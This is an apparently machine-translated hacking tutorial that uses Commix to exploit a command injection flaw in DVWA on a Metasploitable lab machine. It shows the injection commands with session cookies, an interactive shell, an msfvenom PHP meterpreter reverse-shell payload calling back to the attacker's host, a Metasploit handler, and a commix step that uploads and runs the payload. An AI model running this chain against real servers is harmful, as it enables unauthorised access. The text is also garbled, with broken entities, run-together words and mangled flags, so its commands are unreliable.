<img src = "https://img.wonderhowto.com/img/13/62/63675792216954/0/use-commix-automate-exploiting-command-injection-flaws-web-applications.w1456.jpg" alt = "Using Commix to automate the use of command injection errors in web applications  Now you can type commix -h in the terminal to view the help with all the different options that this tool provides.  root @ drd: ~ # commix -h
Use: Commix [option(s)]
-h, –help Show help and exit.
These options are for general affairs.
-v VERBOSE verbosity level (0-4, default: 0).
–version Display and exit version number.
–output-dir = OUT .. Sets the path of the custom output directory.
-s SESSION_FILE Loads a session from a saved file (.sqlite).
–flush-session Deletes the session files for the current destination.
–ignore-session Ignore results stored in the session file.
-t TRAFFIC_FILE Logs all HTTP traffic in a text file.
–batch Never ask for user input, use the default behavior.
–encoding = ENCOD .. Force character encoding used to retrieve data (eg.
–charset = CHARSET Time-related injection character set (eg
–check-internet Check the internet connection before you rate the destination.
This option must be specified to define the destination URL.
-u URL, –url = URL destination URL.
–url-reload Reloads the destination URL after command execution.
-l LOGFILE Parses the destination from the HTTP proxy log file.
-m BULKFILE Scans multiple targets specified in a text file.
-r REQUESTFILE Downloads the HTTP request from a file.
–crawl = CRAWLDEPTH Search the site from the destination URL (1-2,
-x SITEMAP_URL Parse target (s) from a remote Sitemap file (.xml).
These options can be used to specify how to connect to the destination URL.
-d DATA, –data = .. data string to be sent by POST.
–host = HOST HTTP host header.
–referer = REFERER-HTTP-Referer-Header.
–user-agent = AGENT HTTP user agent header.
–random-agent Uses a randomly selected HTTP user-agent header.
–param-del = PDEL Sets the character for the distribution of parameter values.
–cookie = COOKIE HTTP cookie header.
–cookie-del = CDEL Sets a character to split cookie values.
-H HEADER, –hea .. Additional Header (for example, & x39; Forwarded-For: 127.0.0.1 & # 39;).
–headers = HEADERS Additional headers (for example, & Accept-Language: fr nday: 123 & # 39;).
–proxy = PROXY Use an HTTP proxy (for example, & # 39; 127.0.0.1: 8080 & # 39;).
–tor Use the Tor network.
–tor-port = TOR_P .. Set the port proxy port (default: 8118).
–tor-check Check if Tor is being used properly.
–auth-url = AUTH_ .. URL of the login area.
–auth-data = AUTH .. login parameters and data.
–auth-type = AUTH .. HTTP authentication type (e.g., & # 39; Basic & # 39; or & # 39; Digest & # 39;).
–auth-cred = AUTH .. HTTP authentication credentials (for example, & # 39; admin: admin & # 39;).
–ignore-401 Ignore HTTP error 401 (unauthorized).
–force-ssl Forces the use of SSL / HTTPS.
–ignore-redirects ignore redirection attempts.
–retries = RETRIES Repeats the connection when the connection expires (default: 3).
We will use the following options:
-u flag defines the destination URL. The
cookie = option sets the appropriate cookie information. Option
– data = to specify the POST request string.
commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ --cookie = & # 39; PHPSESSID = ba245268c2d2c08a209bf7db8bd004a0; security = low & # 39; - data = & # 39; ip = 127.0.0.1 & submit = submit & # 39;
The tool launches and displays a banner with some version information, followed by some on-screen messages showing the current status. We can see that a parameter is found that is vulnerable to the command input and asks us if we want a pseudo-terminal shell.
/ `___ / __` / & # 39; __` __` / & # 39; __` __` / \ & # 39; v2.6-stable
/ __ // L \\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\ \ introduces us to an interactive command shell. We can now issue commands such as
whoami and uname -a to display information about the server.
Pseudo-Terminal (Type?? For available options)
commix (os_shell)> whoami
commix (os_shell)> uname -a
Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
This is indeed useful, but we can only vaguely imagine. Fortunately, there is a way to combine the functionality of Commix with the powerful msfvenom to ultimately get a meter-meter session on the target.
Method 2: Upload Reverse Shell
Commix has a feature that allows us to write files to the system target system. We'll put a reverse shell
on the target that calls our attack engine, but before we do that, we'll have to build the payload.
Msfvenom is a payload generator that replaces both msfpayload and msfencode back 2015. This single tool can be used to create payloads outside the Metasploit framework.
Use the command
msfvenom with the following options.
-p Flag indicating the payload. Use
lhost to specify the address of the Listening Host. Use
lport to set the listening port. -D flag for specifying the encoder.
-f flag for specifying the output format.
Make sure you type
> to write to the file . payload.php .
root @ drd: ~ # msfvenom -p php / meterpreter / reverse_tcp lhost = 172.16.1.100 lport = 4321 -e php / base64 -f raw> payload.php
[-] No platform was selected, with Msf :: Module :: Platform :: PHP selected from the payload
[-] No arc selected, with the payload arch: php selected
1 compatible encoder was found
Attempt to encode the payload with 1 iteration of PHP / Base64
php / base64 succeeded with size 1507 (iteration = 0)
php / base64 with final size 1507 selected
Payload size: 1507 bytes
The payload was created successfully. Now all we have to do is put the PHP tags in our file. Enter
nano payload.php and add <? Add php at the beginning of the file and [> at the end of the file. Press Ctrl-X Y and Enter to save.
Now we have to open a handler on our machine to intercept the session that is opened on the target. Start Metasploit in a new terminal window by typing
msfconsole . After loading enter with Exploit / Multi / Handler the general purpose handler.
Next, set the payload, listening address, and port that we specified earlier in our file.
msf exploit (multi / handler)> Payload PHP / meterpreter / reverse_tcp set
Payload => php / meterpreter / reverse_tcp
msf exploit (multi / handler)> set host 172.16.1.100
lhost => 172.16.1.100
Set msf exploit (multi / handler)> port 4321
lport => 4321
Once these are set, start the handler by typing
run an exploit alias.
msf exploit (multi / handler)> run
[*] Reverse TCP handler was started at 172.16.1.100:4321[19659018Backinourotherterminalweareabletopre-commitsomeadditionaloptionstobringourpayloadtothetarget The
- file-write Option to specify the file to use on our local computer. The option - file-dest to set the destination on the target. Option - os-cmd to specify the command to execute when the file is written to the destination.
commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ - -cookie = & # 39; PHPSESSID = ba245268c2d2c08a209bf7db8bd004a0; security = low & # 39; - data = & # 39; ip = 127.0.0.1 & submit = submit & # 39; - file-write = & # 39; / root / payload.php & # 39; - file-dest = & # 39; / var / www / payload.php - os-cmd = & # 39; php -f /var/www/payload.php'[19659018ThisallowsourpayloadtobeexecutedonasessionfromourhandlerifitworksproperlyCommixwillnotrunforawhileandfinallywecanfindthatourfilehasbeensuccessfullycreatedonthetarget
[*] Testing the (result-based) classical instruction injection technique ... [ SUCCEED ]
[+] The POST parameter & # 39; ip & # 39; seems to be injectable via the (result-based) classical instruction injection technique.
[~] Payload: Echo YJOSPV $ ((42 + 12)) $ (Echo YJOSPV) YJOSPV
[+] The file /var/www/payload.php was created successfully!
Now you can see in the other terminal that a meterpreter session has actually been opened. We can now execute commands such as
getuid and sysinfo to display information about the destination.
[*] Send Stage (37775 bytes) to 172.16.1.102
[*] Meterpreter Session 1 has been opened at 2018-10-18 11:29:19 -0500 (172.16.1.100:4321 -> 172.16.1.102:40115)
Server username: www-data (33)
OS: Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter: php / linux
These are similar results as before by using Commix alone, but now that we have a Meterpreter session, there is much more flexibility than we can ultimately do.
Conclusion  Hackers attack command injection vulnerabilities due to the potential power they exert over the target system. Commix is a very useful tool that automates the process of finding and exploiting these vulnerabilities and making life a little easier for the hacker.
In this guide, we learned about some basic usage options. We also saw how you combine msfvenom with Commix to upload a payload to the target and get a shell. This flexibility makes Commix an excellent addition to any
Don & # 39; t Miss: Use Metasploit's Web Delivery Script & Command Injection to invoke a shell
Title image by Jarmoluk / Pixabay; Screenshots of drd_ / zero byte